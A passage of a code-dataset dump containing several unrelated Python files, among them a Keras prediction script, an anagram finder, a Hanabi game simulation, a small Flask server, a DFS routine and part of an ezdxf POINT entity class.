{BOTTLENECK}\nNUMPY: {NUMPY}\nNUMBA: {NUMBA}\nMATPLOTLIB: {MATPLOTLIB}\nSCIPY: {SCIPY}\n\n\n================================================================================\nCOMPUTER\n================================================================================\nSYSTEM = {COMPUTER_SYSTEM}\nRELEASE = {COMPUTER_RELEASE}\nVERSION = {COMPUTER_VERSION}\nARCHITECTURE = {COMPUTER_ARCHITECTURE}\nPROCESSOR = {COMPUTER_PROCESSOR}\nRAM = {COMPUTER_RAM}\nUSER = {USER}\nHOST = {HOST}\nHOME = {HOME}\n\nPATH:\n{PATH}\n \n \"\"\"\n\n print(print_string.format(**keys))\n\n\n# =============================================================================\n# Start of code\n# =============================================================================\nif __name__ == \"__main__\":\n # run main with no arguments\n main()\n\n# =============================================================================\n# End of code\n# =============================================================================\n","sub_path":"general/shell_vs_call/shell_vs_call.py","file_name":"shell_vs_call.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"83464681","text":"#coding=utf-8\n# Load and use a saved model\nfrom keras.models import load_model\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nimport pandas as pd\n\n# Tokenizer vectorizes text into sequences of word indices (1-based) from a fitted vocabulary.\n# NOTE: it must be fitted on the training vocabulary first; as written it is assumed to be restored elsewhere.\ntokenizer = Tokenizer(num_words=200, filters='!\"#$%&()*+,-./:;<=>?@[\\]^_`{|}~', lower=True)\ntext = input(\"Enter the data to predict: \")\nprint(\"Loading model...\")\nmodel = load_model(\"/home/sun/文档/地铁项目/LSTM_model.h5\")  # path kept as in the original environment\nseq = tokenizer.texts_to_sequences([text])  # wrap in a list so the string is not split per character\npadded = pad_sequences(seq, 
maxlen=14)\npred = model.predict(padded)\nItemName_id = pred.argmax(axis=1)[0]\n# NOTE: ItemName_id_df (the id-to-name mapping built during training) is assumed to be loaded before this lookup.\nItemName = ItemName_id_df[ItemName_id_df.ItemName_id==ItemName_id]['ItemName'].values[0]\n\nprint(\"\\nPredicting on the input data: \")\nprint(text)\nprint(\"\\nThe predicted result is: \")\nprint(ItemName)\n","sub_path":"yinan/UseModel/UseModel.py","file_name":"UseModel.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"83175336","text":"from collections import defaultdict\n\ndef annograms(word):\n words = [w.rstrip() for w in open('WORD.LST')]\n\n list_of_annograms = []\n count_char_input = defaultdict(lambda : 0)\n count_char_aux = defaultdict(lambda : 0)\n\n # count the characters in the input word\n for character in word:\n count_char_input[character] += 1\n\n # count the characters in each candidate word from the list\n for candidate in words:\n for character in candidate:\n count_char_aux[character] += 1\n # add the candidate if it is an anagram\n if count_char_input == count_char_aux:\n list_of_annograms.append(candidate)\n # reset the counter for the next candidate\n count_char_aux = defaultdict(lambda : 0)\n\n return list_of_annograms\n\nif __name__ == \"__main__\":\n print(annograms(\"train\"))\n print('--')\n print(annograms('drive'))\n print('--')\n print(annograms('python'))\n","sub_path":"annograms.py","file_name":"annograms.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"64273441","text":"\"\"\"Load AlexNet model and return it.\n\nReturns:\n Module: Torch Module of AlexNet.\n\"\"\"\nfrom torchvision.models import alexnet\n\nfrom models.base_model import Model\n\n\nclass AlexNet(Model):\n \"\"\"Loads AlexNet model.\n \"\"\"\n def __init__(self) -> None:\n \"\"\"Initialize AlexNet model.\n \"\"\"\n # setup\n super().__init__(model=alexnet(pretrained=True))\n\n\nif __name__ == \"__main__\":\n alex = AlexNet()\n print(alex.print_summary())\n","sub_path":"models/alexnet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"136253339","text":"import numpy as np\nimport heapq\n\nnum_course = 1951\nnum_train_job = 566\n\nbert_pretrain_job_npy_path = '/Users/jeremyhao/Desktop/revise_paper/bert_pretrain/bert_pretrain_job.npy'\nbert_pretrain_course_npy_path = '/Users/jeremyhao/Desktop/revise_paper/bert_pretrain/bert_pretrain_course.npy'\n\ndef cos_sim(c, j):\n '''\n calculate the cosine similarity between two vectors\n '''\n vector_a = np.asarray(c).ravel()\n vector_b = np.asarray(j).ravel()\n\n num = float(np.dot(vector_a, vector_b))\n denom = np.linalg.norm(vector_a) * np.linalg.norm(vector_b)\n cos = num / denom\n sim = 0.5 + 0.5 * cos\n return sim\n'''\nbert pretrain\n'''\ndef generate_dict(output_file):\n course_list = range(num_course)\n job_vector = np.load(bert_pretrain_job_npy_path)\n course_vector = np.load(bert_pretrain_course_npy_path)\n with open(output_file, 'w') as writer:\n for job_index in range(num_train_job):\n writer.write(str(job_index)+' ')\n job_ebd = job_vector[job_index]\n predictions = []\n for course_index in range(num_course):\n course_ebd = course_vector[course_index]\n predictions.append(cos_sim(course_ebd, job_ebd))\n map_course_score = {course_list[t]: predictions[t] for t in range(len(course_list))}\n ranklist = heapq.nlargest(num_course, map_course_score, key=map_course_score.get)\n for item in ranklist:\n writer.write(str(item)+' ')\n writer.write('\\n')\n\n","sub_path":"majority_voting_dict/code/generate_bert_dict.py","file_name":"generate_bert_dict.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"201596330","text":"\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Card:\n def __init__(self, color, number, id):\n self.color = color\n self.number = number\n self.id = id\n self.known_color = False\n self.known_number = False\n\nclass Player:\n def __init__(self, id, hand, otherplayers, commondicts, colors_all):\n self.id = id\n self.hand = hand\n self.otherplayers = otherplayers\n self.commondicts = commondicts\n self.known_hand = [('black',0),('black',0),('black',0),('black',0)] # 0 is unknown, and so is black\n self.colors_all = colors_all\n\n def update_info(self, otherplayers, commondicts):\n self.otherplayers = otherplayers\n self.commondicts = commondicts\n\n# select what to do according to the strategy\n def select_action(self,possibility_tables,playable_cards,possible_cards,dead_cards,hint_count,handstable):\n if not self.check_whether_playable_card(possibility_tables,playable_cards) == -1:\n return ['PLAY', self.check_whether_playable_card(possibility_tables,playable_cards)]\n elif (np.sum(playable_cards) + (50-np.sum(np.sum(possible_cards)))) < 5 and self.check_dead_card(possibility_tables,dead_cards) >= 0:\n return ['DISCARD UNDER 5', self.check_dead_card(possibility_tables,dead_cards)]\n elif hint_count > 0:\n return ['HINT']\n elif self.check_dead_card(possibility_tables,dead_cards) >= 0:\n return ['DISCARD DEAD CARD', self.check_dead_card(possibility_tables,dead_cards)]\n # TODO: check the next two elif statements\n elif self.check_whether_card_known_duplicate(possibility_tables,handstable) != -1:\n return ['DISCARD DUPLICATE', self.check_whether_card_known_duplicate(possibility_tables,handstable)]\n elif self.check_whether_dispensable_card_known(possibility_tables, possible_cards) != -1:\n return ['DISCARD DISPENSABLE', self.check_whether_dispensable_card_known(possibility_tables, possible_cards)]\n else:\n # to do: the first card could be indispensable but still gets discarded. Add priority to hint?\n # note sanne: we only go here if there are no hints left\n return ['DISCARD FIRST CARD', 0]\n\n# check whether one of the cards in the hand is playable; if so, return the index of that card\n def check_whether_playable_card(self,possibility_tables,playable_cards):\n for card in range(0,4):\n possibly_playable = True\n for color in range(0,5):\n for value in range(0,5):\n # if one of the possibilities is not playable, the card is not certainly playable\n if possibility_tables[self.id,card,color,value] != 0:\n if value != playable_cards[color]:\n possibly_playable = False\n if possibly_playable:\n return card\n return -1\n\n\n# check whether one of the cards in the hand is dead; if so, return the index of that card\n def check_dead_card(self, possibility_tables, dead_cards):\n # check for each card whether all possibilities are dead\n for card in range(0,4):\n possibly_all_dead = True\n for color in range(0,5):\n for value in range(0,5):\n if possibility_tables[self.id,card,color,value] != 0 and value > dead_cards[color]:\n possibly_all_dead = False\n break\n if not possibly_all_dead:\n break\n if possibly_all_dead:\n return card\n return -1\n\n# check whether one card is known to be a duplicate (in the hands of other players)\n def check_whether_card_known_duplicate(self,possibility_tables,handstable):\n for card in range(0,4):\n for color in range(0,5):\n for value in range(0,5):\n if possibility_tables[self.id,card,color,value] == 1:\n card_dup = [self.colors_all[color],value]\n if card_dup in handstable:\n return card\n return -1\n\n\n# check whether one card is known to be dispensable\n def check_whether_dispensable_card_known(self,possibility_tables,possible_cards):\n for card in range(0,4):\n possible_dispensable = True\n for color in range(0,5):\n for value in range(0,5):\n if possibility_tables[self.id,card,color,value] == 1:\n if possible_cards[color,value] < 2:\n possible_dispensable = False\n break\n if not possible_dispensable:\n break\n if possible_dispensable:\n return card\n return -1\n\n\n\n\nclass Game:\n def __init__(self, nplayers, ncards, ncolors):\n self.colors_all = ['white', 'blue', 'red', 'green', 'yellow', 'orange']\n self.colors_all = self.colors_all[:ncolors]\n self.cardlist = [0,0,0,1,1,2,2,3,3,4]\n self.hint_count = 8\n self.mistake_count = 3\n self.score = 0\n self.play_token = 1\n self.nplayers = nplayers\n self.ncards = ncards\n self.ncolors = ncolors\n self.center = {}\n self.playable_cards = np.zeros((ncolors))\n self.dead_cards = np.zeros((ncolors)) - 1\n # print(self.playable_cards)\n self.discard_pile = []\n self.commondicts = {'center': self.center,\n 'discard_dict': self.discard_pile\n }\n playerlist = self.create_players(self.nplayers, self.commondicts)\n self.playerlist = playerlist\n self.deck = self.create_deck(self.colors_all[0:self.ncolors+1], self.cardlist)\n self.possibility_tables = np.zeros((nplayers,ncards,ncolors,5)) + 1\n self.possible_cards = np.array([[3,2,2,2,1],[3,2,2,2,1],[3,2,2,2,1],[3,2,2,2,1],[3,2,2,2,1]])\n\n\n# function that updates the number of cards still possible to have in your hand,\n# for every card (i.e. 
not discarded or played)\n def update_possible_cards(self,card_color,card_value):\n self.possible_cards[card_color,card_value] -= 1\n # if the number of cards of this type becomes equal to 0, this is common\n # knowledge and this card is for no one possible to have in their hand\n if self.possible_cards[card_color, card_value] == 0:\n self.possibility_tables[:,:,card_color, card_value] = 0\n\n# Hints also have to be incorporated wordly (the explicit meaning of the hings)\n def incorporate_hint_wordly(self,player,cards,value_color,color_hint):\n if color_hint:\n for color in range(0,self.ncolors):\n if color != value_color:\n self.possibility_tables[player,cards,color,:] = 0\n else:\n for value in range(0,5):\n if value != value_color:\n self.possibility_tables[player,cards,:, value] = 0\n\n# what cards can the player see on the table now\n def cards_on_table_seen(self):\n handtotal = []\n for i in range(0,self.nplayers):\n if i != self.turn_token:\n handtotal += self.playerlist.get(i).hand\n return handtotal\n\n# return the cards that are targeted this round\n# calculates for all players the probability of all cards to be playable\n# and targets the cards with highest probability per player\n def return_targeted_cards(self):\n targeted_cards = np.zeros((self.nplayers))\n for player in range(0,self.nplayers):\n cards = np.zeros((self.ncards))\n for card in range(0,self.ncards):\n ncards = 0\n nplayable_cards = 0\n for color in range(0,self.ncolors):\n for value in range(0,5):\n if self.possibility_tables[player,card,color,value] == 1:\n ncards += self.possible_cards[color,value]\n if self.playable_cards[color] == value:\n nplayable_cards += self.possible_cards[color,value]\n if ncards!=0:\n cards[card] = nplayable_cards/ncards\n\n targeted_cards[player] = int(np.argmax(cards))\n\n return targeted_cards\n\n\n# create hint tables for all the targeted cards\n def targeted_cards_to_hints(self, targeted_cards):\n# initialize them with 0's on dead cards, -1's on impossible cards and\n# 1,2,3,4,5,6,7,7,7,7,7,7 etc.\n hint_tables = np.zeros((self.nplayers,self.ncolors,5))\n for player in range(0,self.nplayers):\n hint_table = self.possibility_tables[player,int(targeted_cards[player]),:,:] -1\n hintnum = 1\n for value in range(0,5):\n for color in range(0,self.ncolors):\n if hint_table[color,value] == 0 and self.dead_cards[color] < value:\n hint_table[color,value] = hintnum\n if hintnum != 7:\n hintnum += 1\n u, counts = np.unique(hint_table, return_counts = True)\n # make sure that no hint value occurs more than 8 times\n if len(counts) > 6:\n if counts[-1] > 8:\n seven_surplus = counts[-1]-8\n six_surplus = 0\n if seven_surplus > 8:\n six_surplus = seven_surplus-7\n seven_surplus = 8\n for value in range(0,5):\n for color in range(0,self.ncolors):\n if (hint_table[color,value] == 7 or hint_table[color,value] == 6) and six_surplus > 0:\n hint_table[color,value] = 5\n six_surplus -= 1\n elif hint_table[color,value] == 7 and seven_surplus >0:\n hint_table[color,value] = 6\n seven_surplus -= 1\n hint_tables[player,:,:] = hint_table\n return hint_tables\n\n# decide which hint to give, making use of the hint tables\n def decide_hint(self, origin_player_id,targeted_cards,hint_tables):\n # decide on which hidden hint to play\n sum = 0\n for coplayers in range(0,self.nplayers):\n if coplayers != origin_player_id:\n hand = self.playerlist.get(coplayers).hand\n card_index = targeted_cards[coplayers]\n hint_table = hint_tables[coplayers,:,:]\n true_card = hand[int(card_index)]\n color_int = 
self.colors_all.index(true_card[0])\n val = true_card[1]\n sum += hint_table[color_int,val]\n hintval = sum%8\n# convert this hidden hint value into a wordly hint\n hint = self.convert_val_to_hint(origin_player_id,hintval,targeted_cards)\n return hint\n\n# make a wordly hint of the hint value\n def convert_val_to_hint(self,player,hintval,targeted_cards):\n # decode value to wordly hint\n hint_player = int((hintval%4 + player)%5)\n hint_color = True\n if hintval < 4:\n hint_color = False\n hand = self.playerlist.get(hint_player).hand\n tg = targeted_cards[int(hint_player)]\n# decide on which cards to give hints about\n# prioritize colors/values that occur more often\n if hint_color:\n indices = []\n colors = [hand[0][0],hand[1][0],hand[2][0],hand[3][0]]\n if len(colors) == len(list(set(colors))) + 1:\n if colors[0] == colors[1]:\n indices += [0,1]\n if colors[0] == colors[2]:\n indices += [0,2]\n if colors[0] == colors[3]:\n indices += [0,3]\n if colors[1] == colors[2]:\n indices += [1,2]\n if colors[2] == colors[3]:\n indices += [2,3]\n if colors[1] == colors[3]:\n indices += [1,3]\n elif len(colors) == len(list(set(colors))) + 2:\n if colors[0] == colors[1] == colors[2]:\n indices += [0,1,2]\n if colors[3] == colors[1] == colors[2]:\n indices += [3,1,2]\n if colors[0] == colors[1] == colors[3]:\n indices += [0,1,3]\n if colors[0] == colors[2] == colors[3]:\n indices += [0,3,2]\n if colors[0] == colors[1] and colors[2] == colors[3]:\n indices += [2,3]\n if colors[0] == colors[2] and colors[1] == colors[3]:\n indices += [1,3]\n if colors[0] == colors[3] and colors[1] == colors[2]:\n indices += [1,2]\n elif len(list(set(colors))) == 1:\n indices += [0,1,2,3]\n else:\n\n reduce = 0\n indices = [1]\n\n for i in range(1,self.ncards):\n ncards = np.sum(np.sum(self.possibility_tables[hint_player,i,:,:]))\n ncardspercolor = np.sum(self.possibility_tables[hint_player,i,self.colors_all.index(hand[i][0]),:])\n if ncards - ncardspercolor > reduce:\n reduce = ncards - ncardspercolor\n indices = [i]\n\n return [hint_player,indices,hand[indices[0]][0],hint_color]\n else:\n indices = []\n colors = [hand[0][1],hand[1][1],hand[2][1],hand[3][1]]\n if len(colors) == len(list(set(colors))) + 1:\n if colors[0] == colors[1]:\n indices += [0,1]\n if colors[0] == colors[2]:\n indices += [0,2]\n if colors[0] == colors[3]:\n indices += [0,3]\n if colors[1] == colors[2]:\n indices += [1,2]\n if colors[2] == colors[3]:\n indices += [2,3]\n if colors[1] == colors[3]:\n indices += [1,3]\n elif len(colors) == len(list(set(colors))) + 2:\n if colors[0] == colors[1] == colors[2]:\n indices += [0,1,2]\n if colors[3] == colors[1] == colors[2]:\n indices += [3,1,2]\n if colors[0] == colors[1] == colors[3]:\n indices += [0,1,3]\n if colors[0] == colors[2] == colors[3]:\n indices += [0,3,2]\n if colors[0] == colors[1] and colors[2] == colors[3]:\n indices += [2,3]\n if colors[0] == colors[2] and colors[1] == colors[3]:\n indices += [1,3]\n if colors[0] == colors[3] and colors[1] == colors[2]:\n indices += [1,2]\n elif len(list(set(colors))) == 1:\n indices += [0,1,2,3]\n else:\n\n reduce = 0\n indices = [1]\n\n for i in range(1,self.ncards):\n ncards = np.sum(np.sum(self.possibility_tables[hint_player,i,:,:]))\n ncardspercolor = np.sum(self.possibility_tables[hint_player,i,:, hand[i][1]])\n if ncards - ncardspercolor > reduce:\n reduce = ncards - ncardspercolor\n indices = [i]\n\n return [hint_player,indices,hand[indices[0]][1],hint_color]\n\n\n def convey_hidden_hint(self,hint, origin_player_id,targeted_cards,hint_tables):\n 
hint_player = (hint[0] + 5 - origin_player_id)%4\n if hint[3]:\n hint_player += 4\n # print(\"hint_player = \"+str(hint_player))\n\n for coplayers in range(0, self.nplayers):\n if coplayers != origin_player_id:\n sum = 0\n for other in range(0, self.nplayers):\n if other != coplayers and other != origin_player_id:\n hand = self.playerlist.get(other).hand\n # print ('Handsan:',[c for c in hand])\n card_index = targeted_cards[other]\n # print(card_index)\n hint_table = hint_tables[other,:,:]\n true_card = hand[int(card_index)]\n color_int = self.colors_all.index(true_card[0])\n val = true_card[1]\n # print(\"other \" + str(other) + str(hint_table[color_int,val]) + str(true_card))\n sum += hint_table[color_int,val]\n # print(\"sum = \" +str(sum))\n # print(\"hintval = \" +str(sum%8) )\n # print(\"hint_player = \"+str(hint_player))\n hintval = (sum + 8)%8\n hintval = (hint_player + 8 - hintval)%8\n # print(\"hv =\" +str(hintval))\n for color in range(0,self.ncolors):\n for value in range(0,5):\n if hint_tables[coplayers,color,value] != hintval:\n self.possibility_tables[coplayers,int(targeted_cards[coplayers]),color,value] =0\n\n\n\n def create_players(self, nplayers, commondicts):\n playerlist = {}\n pids = range(0,self.nplayers)\n for pid in pids:\n otherplayers = {}\n others = [p for p in pids if p is not pid]\n for other in others:\n otherplayers.update({other:[]})\n #print (otherplayers)\n playerlist.update({pid:Player(id=pid, hand=[], commondicts=commondicts, otherplayers=otherplayers, colors_all = self.colors_all)})\n return playerlist\n\n def create_deck(self, colors, cardlist):\n deck = []\n id = 1\n for c in colors:\n for n in cardlist:\n #newcard = Card(id = id, color=c, number=int(n))\n newcard = [c,n]\n deck.append(newcard)\n random.shuffle(deck)\n id+=1\n return deck\n\n def deal_initial(self):\n for i in range(1, self.ncards+1):\n pids = self.playerlist.keys()\n for j in pids:\n self.deal_card(pid=j)\n return True\n\n def deal_card(self, pid): #Currently being corrected\n if (len(self.playerlist.get(pid).hand) < self.ncards):\n card = self.deck.pop()\n playerinfo = self.playerlist.get(pid)\n h = playerinfo.hand.append(card)\n else:\n print ('Hand already full')\n\n def print_player_info(self):\n for id in self.playerlist.keys():\n print('Player ID: ',id)\n this_player = self.playerlist.get(id)\n #print ('Hand:',[[c.color,c.number] for c in this_player.hand])\n print ('Hand:',[c for c in this_player.hand])\n\n def update_player_info(self):\n commondicts = self.commondicts\n for pid in self.playerlist.keys():\n thisplayer = self.playerlist.get(pid)\n othersdict = {}\n others = [x for x in self.playerlist.keys() if x is not pid]\n for other in others:\n h = self.playerlist.get(other).hand\n othersdict.update({other:h})\n #print (othersdict)\n thisplayer.update_info(otherplayers=othersdict, commondicts=commondicts)\n\n\n\n def play_card(self, player_id, card_to_play):\n carddetails = self.playerlist.get(player_id).hand.pop(card_to_play)\n color = self.colors_all.index(carddetails[0])\n value = carddetails[1]\n self.dead_cards[color] += 1\n self.playable_cards[color] += 1\n self.update_possible_cards(color,value)\n for card in range(card_to_play,3):\n self.possibility_tables[player_id,card,:,:] = self.possibility_tables[player_id,card + 1,:,:]\n newcard = np.zeros((self.ncolors,5))\n newcard[np.where(self.possible_cards > 0)] = 1\n self.possibility_tables[player_id,3,:,:] = newcard\n\n self.deal_card(pid=player_id)\n self.score += 1\n\n def play_discard(self, player_id, 
card_index):\n # print(card_index)\n selected_card = self.playerlist.get(player_id).hand.pop(card_index)\n for card in range(card_index,3):\n self.possibility_tables[player_id,card,:,:] = self.possibility_tables[player_id,card + 1,:,:]\n newcard = np.zeros((self.ncolors,5))\n newcard[np.where(self.possible_cards > 0)] = 1\n self.possibility_tables[player_id,3,:,:] = newcard\n self.deal_card(player_id)\n self.discard_pile.append(selected_card)\n self.hint_count+=1\n # check if there are other variables that need updating when a card is discarded\n self.update_possible_cards(self.colors_all.index(selected_card[0]),selected_card[1])\n\n def play_game(self):\n # select the player to start\n self.turn_token = 0 # could be randomized\n # self.incorporate_hint_wordly(2,3,1,True)\n # self.incorporate_hint_wordly(3,0,0,False)\n # self.incorporate_hint_wordly(1,2,3,True)\n # print(self.possibility_tables[4,0])\n tg = self.return_targeted_cards()\n # print(self.targeted_cards_to_hints(tg))\n # loop until the tokens run out; keep playing while cards remain, or while players still get their one last turn after the deck runs out\n last_turn = True\n player_last_turn = 0\n while self.mistake_count >= 0 and self.score != 25 and (sum(sum(self.possible_cards)) > self.nplayers * self.ncards or last_turn):\n # make sure every player gets one last turn before the game ends\n if sum(sum(self.possible_cards)) <= self.nplayers * self.ncards:\n player_last_turn += 1\n if player_last_turn == self.nplayers:\n last_turn = False\n # print(\"mistake was made\")\n # Update player info\n self.update_player_info()\n targeted_cards = self.return_targeted_cards()\n hint_tables = self.targeted_cards_to_hints(targeted_cards)\n # Call to player for action\n this_act = self.playerlist.get(self.turn_token).select_action(self.possibility_tables,self.playable_cards,self.possible_cards, self.dead_cards,self.hint_count,self.cards_on_table_seen())\n # perform action\n if this_act[0] == 'PLAY':\n self.play_card(self.turn_token, this_act[1])\n elif this_act[0] == 'HINT':\n # decide which hint to give\n hint = self.decide_hint(self.turn_token, targeted_cards,hint_tables)\n if hint[3]:\n value_color = int(self.colors_all.index(hint[2]))\n else:\n value_color = hint[2]\n # convey the hidden meaning\n self.convey_hidden_hint(hint,self.turn_token,targeted_cards,hint_tables)\n # convey the wordly meaning\n self.incorporate_hint_wordly(int(hint[0]),hint[1],value_color,hint[3])\n self.hint_count = self.hint_count - 1\n\n elif this_act[0].split()[0] == 'DISCARD':\n self.play_discard(self.turn_token, this_act[1])\n# switch turns\n self.turn_token += 1\n if self.turn_token == self.nplayers:\n self.turn_token = 0\n print(\"Score = \" + str(self.score))\n print(\"Num Cards Left = \" + str(sum(sum(self.possible_cards))))\n return self.score\n\n\ndef gameloop():\n scores = []\n for i in range(0,500):\n\n manager = Game(5,4,5)\n # print (manager.playerlist)\n manager.deal_initial()\n # manager.print_player_info()\n scores += [manager.play_game()]\n print(np.mean(scores))\n plt.hist(scores)\n plt.xticks(list(set(scores)))\n plt.title('Scores Distribution over 500 games for 5 players')\n plt.xlabel('Final Scores')\n plt.ylabel('Count')\n plt.show()\n\n #get latest game elements\n #decide action\n #hint\n #discard\n #play\n #updates lie within action code\n #next turn\n\ngameloop()\n#manager = Game(5,4,5)\n# print (manager.playerlist)\n#manager.deal_initial()\n# 
manager.print_player_info()\n#manager.play_game()\n","sub_path":"tempf.py","file_name":"tempf.py","file_ext":"py","file_size_in_byte":24176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"506482952","text":"from flask import Flask, jsonify\napp = Flask(__name__)\n\nprint(\"initializing\")\n\nimport modelFactory\nfrom modelBase import Suggestion\n\ncliModel = modelFactory.getBaselineModel()\n\n@app.route('/')\ndef hello_world():\n return 'Welcome to smart cloud shell! Please help with testing/labeling at https://bizqnabootcamp.azurewebsites.net/'\n\n@app.route('/cli/')\ndef cliWithCmd(query):\n result = cliModel.getLegacyResult(query)\n return jsonify(result)\n\n@app.route('/cli/help/')\ndef cliWithHelp(query):\n result = cliModel.getLegacyResult(query)\n return jsonify(result)\n\nport = 80\nprint(\"localhost:%d is serving\" % port)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=port)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"117201263","text":"import numpy as np\nimport pickle\nclass dataclass():\n \"\"\"\n operactions with data\n\n This class contains all the parameters related with the training, validating and testing dataset.\n All the parameters are set outside this class! They are not supposed to be set here.\n\n fcn:\n GetTraindata(): returns the training data for the network\n Getvaldata(): returns the validating data for the network\n \n \"\"\"\n def __init__(self, dataname='', dimpara=[], datadim=[], testdataname=''):\n self.trainsize = dimpara[0]\n self.batchsize = dimpara[1]\n self.validatesize = dimpara[2]\n self.Nbofbatch=self.trainsize//self.batchsize\n self.datadim = datadim #[imput dim0 dim1..., output dim]\n if dataname[0]=='':\n self.data= []\n else: \n with open(dataname[0], 'rb') as f:\n self.data=pickle.load(f)\n self.featurename = dataname[1]\n self.labelitem = dataname[2]\n self.labelname = dataname[3]\n self.testdataname = testdataname\n # print(self.data[self.featurename].shape)\n \n def Gettraindata(self,startbatch=0):\n inputx = self.data[self.featurename][startbatch*self.batchsize:(startbatch+1)*self.batchsize,:].reshape([self.batchsize]+self.datadim[:-1])\n inputy = np.array(self.data[self.labelitem][self.labelname].iloc[startbatch*self.batchsize:(startbatch+1)*self.batchsize]).reshape(self.batchsize,1)\n return inputx, inputy\n\n def Getvaldata(self):\n valx = self.data[self.featurename][self.trainsize:self.trainsize+self.validatesize,:].reshape([self.validatesize]+self.datadim[:-1])\n valy = np.array(self.data[self.labelitem][self.labelname].iloc[self.trainsize:self.trainsize+self.validatesize]).reshape(self.validatesize,1)\n return valx, valy\n \n def Gettestdata(self,flag):\n with open(self.testdataname, 'rb') as f:\n datafromfile=pickle.load(f)\n testsize = datafromfile[self.featurename].shape[0]\n testx = datafromfile[self.featurename][:,800+flag:2200+flag].reshape([testsize]+self.datadim[:-1])\n return testx\n","sub_path":"nnx/network/dataclass.py","file_name":"dataclass.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"4486882","text":"from collections import deque\n\ndef dfs(graph, source, target, condition=None, process=None):\n visited, stack = [False] * graph.V, deque()\n stack.append(source)\n\n while stack:\n u = stack.pop()\n 
visited[u] = True\n if u == target:\n break\n if condition != None:\n for edge in graph.edges(u):\n u, v, _ = edge\n if not visited[v] and condition(edge):\n if process != None:\n process(edge)\n stack.append(v)\n else:\n for edge in graph.edges(u):\n u, v, _ = edge\n if not visited[v]:\n if process != None:\n process(edge)\n stack.append(v)\n return visited","sub_path":"algorithms/traversal/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"631296889","text":"# Copyright (c) 2019-2020 Manfred Moitzi\n# License: MIT License\n# Created 2019-02-15\nfrom typing import TYPE_CHECKING\nfrom ezdxf.math import Vector, Matrix44\nfrom ezdxf.math.transformtools import transform_thickness_and_extrusion_without_ocs\nfrom ezdxf.lldxf.attributes import DXFAttr, DXFAttributes, DefSubclass, XType\nfrom ezdxf.lldxf.const import DXF12, SUBCLASS_MARKER\nfrom .dxfentity import base_class, SubclassProcessor\nfrom .dxfgfx import DXFGraphic, acdb_entity\nfrom .factory import register_entity\n\nif TYPE_CHECKING:\n from ezdxf.eztypes import TagWriter, DXFNamespace, UCS\n\n__all__ = ['Point']\n\nacdb_point = DefSubclass('AcDbPoint', {\n 'location': DXFAttr(10, xtype=XType.point3d, default=Vector(0, 0, 0)),\n 'thickness': DXFAttr(39, default=0, optional=True),\n 'extrusion': DXFAttr(210, xtype=XType.point3d, default=Vector(0, 0, 1), optional=True),\n # angle of the X axis for the UCS in effect when the point was drawn (optional, default = 0); used when PDMODE is\n # nonzero\n 'angle': DXFAttr(50, default=0, optional=True),\n})\n\n\n@register_entity\nclass Point(DXFGraphic):\n \"\"\" DXF POINT entity \"\"\"\n DXFTYPE = 'POINT'\n DXFATTRIBS = DXFAttributes(base_class, acdb_entity, acdb_point)\n\n def load_dxf_attribs(self, processor: SubclassProcessor = None) -> 'DXFNamespace':\n \"\"\" Loading interface. (internal API) \"\"\"\n dxf = super().load_dxf_attribs(processor)\n if processor:\n tags = processor.load_dxfattribs_into_namespace(dxf, acdb_point)\n if len(tags) and not processor.r12:\n processor.log_unprocessed_tags(tags, subclass=acdb_point.name)\n return dxf\n\n def export_entity(self, tagwriter: 'TagWriter') -> None:\n \"\"\" Export entity specific data as DXF tags. (internal API) \"\"\"\n # base class export is done by parent class\n super().export_entity(tagwriter)\n # AcDbEntity export is done by parent class\n if tagwriter.dxfversion > DXF12:\n tagwriter.write_tag2(SUBCLASS_MARKER, acdb_point.name)\n # for all DXF versions\n self.dxf.export_dxf_attribs(tagwriter, ['location', 'thickness', 'extrusion', 'angle'])\n\n def transform(self, m: Matrix44) -> 'Point':\n \"\"\" Transform POINT entity by transformation matrix `m` inplace.\n\n .. versionadded:: 0.13\n\n \"\"\"\n self.dxf.location = m.transform(self.dxf.location)\n transform_thickness_and_extrusion_without_ocs(self, m)\n # ignore dxf.angle!\n return self\n\n def translate(self, dx: float, dy: float, dz: float) -> 'Point':\n \"\"\" Optimized POINT translation about `dx` in x-axis, `dy` in y-axis and `dz` in z-axis,\n returns `self` (floating interface).\n\n .. 
